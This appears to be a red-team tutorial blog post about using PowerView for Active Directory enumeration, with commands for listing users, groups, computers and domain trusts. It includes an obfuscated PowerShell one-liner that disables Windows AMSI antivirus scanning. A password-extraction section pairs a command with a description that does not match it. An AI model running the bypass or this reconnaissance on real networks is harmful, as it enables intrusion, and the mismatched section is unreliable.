PowerView is a PowerShell script developed by Will Schroeder and available as part of the PowerSploit framework. It is primarily used for performing domain reconnaissance in Windows environments.

It provides various capabilities to gather information about Active Directory (AD) domains, including user accounts, group memberships, domain controllers, trusts, and more.

PowerView’s main purpose is to assist in the discovery and enumeration of Active Directory environments.

Here are some of its key features and functionalities:

  1. User Enumeration: The tool can help you identify users within the domain, including disabled and locked-out accounts. It provides details such as usernames, security identifiers (SIDs), and group memberships.
  2. Group Enumeration: It allows you to list domain groups, their members, and nested group memberships. This is crucial for understanding the permissions and access control within an Active Directory environment.
  3. Computer Enumeration: Helps identify computers within the domain, their operating systems, and other relevant information. This is valuable for identifying potential targets for further analysis or exploitation.
  4. Shares and Permissions: Find shared folders and their associated permissions. This can be helpful in identifying sensitive data and potential security misconfigurations.
  5. Local Admin Rights: It assists in identifying machines where a specific user has local administrator rights, which can be crucial for lateral movement during penetration testing.
  6. Session Enumeration: It can enumerate active sessions on domain-joined machines, helping you understand who is currently logged in and what they are doing.
  7. ACL Enumeration: It allows you to list the permissions associated with objects in the Active Directory, providing insights into potential security vulnerabilities.

Obtain PowerView

Download the PowerSploit framework from the GitHub repository (https://github.com/PowerShellMafia/PowerSploit) or clone the repository using Git.

Launch a PowerShell session


import the PS module using the following command:

Import-Module <Path to PowerView.ps1>

ByPass Antivirus Detection

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
image 1
PowerView: Everything you should know for FREE 9

Enumerate Domain Controllers

The PV module provides several commands to gather domain information.

Enumerate all user accounts

This command shows the list of user accounts in the domain. Additional parameters can be used to filter the list based on various criteria.

image 2

Enumerate all groups in the domain

This command shows the list of groups in the domain.

Additional parameters can be used to filter the list based on various criteria.

image 3

Enumerate domain controllers

This command shows the list of domain controllers in the domain.

image 4

Enumerate domain trusts

This will retrieve a list of all domain trusts in the current domain.

To retrieve trust information about a specific domain, you can specify the domain name using the -Domain parameter:

image 5

Get-NetDomainTrust is a cmdlet that can be used to retrieve trust relationships between domains within an Active Directory forest.

It provides information about the directionality and type of trust which can be useful for understanding the structure and security of the forest.

Explore User and Group Information

It allows you to query user and group information in detail.

Here are some commands you can use:

Get information about a specific user

Get-NetUser -SamAccountName <username>

Get group memberships of a specific user – This command shows the list of members in a specified group.

Get-NetGroupMember -GroupName <groupname>

Get information about a specific group – This command shows the list of groups in the domain. Additional parameters can be used to filter the list based on various criteria.

Get-NetGroup -GroupName <groupname>

Search for Specific Objects

PowerView offers searching capabilities to find specific objects within the domain.

Search for a specific computer

Find-NetComputer -Ping -HostName <computername>

Perform Delegated User Hunting

Identify user accounts with delegated permissions.


Extract Local Administrator Passwords

Retrieve local administrator passwords stored on domain-joined systems.

This requires administrative privileges or access to the Active Directory database.

Invoke-UserImpersonation -Target <targethostname>

These are just a few examples of what PV can do for domain reconnaissance.


In conclusion, PowerView is a powerful tool that can assist in domain enumeration. Properly identifying and securing domain resources is critical to maintaining a secure system and protecting sensitive information.

Red Team Penetration Testing


Avatar of RFS

RFS (36)

Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.

Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.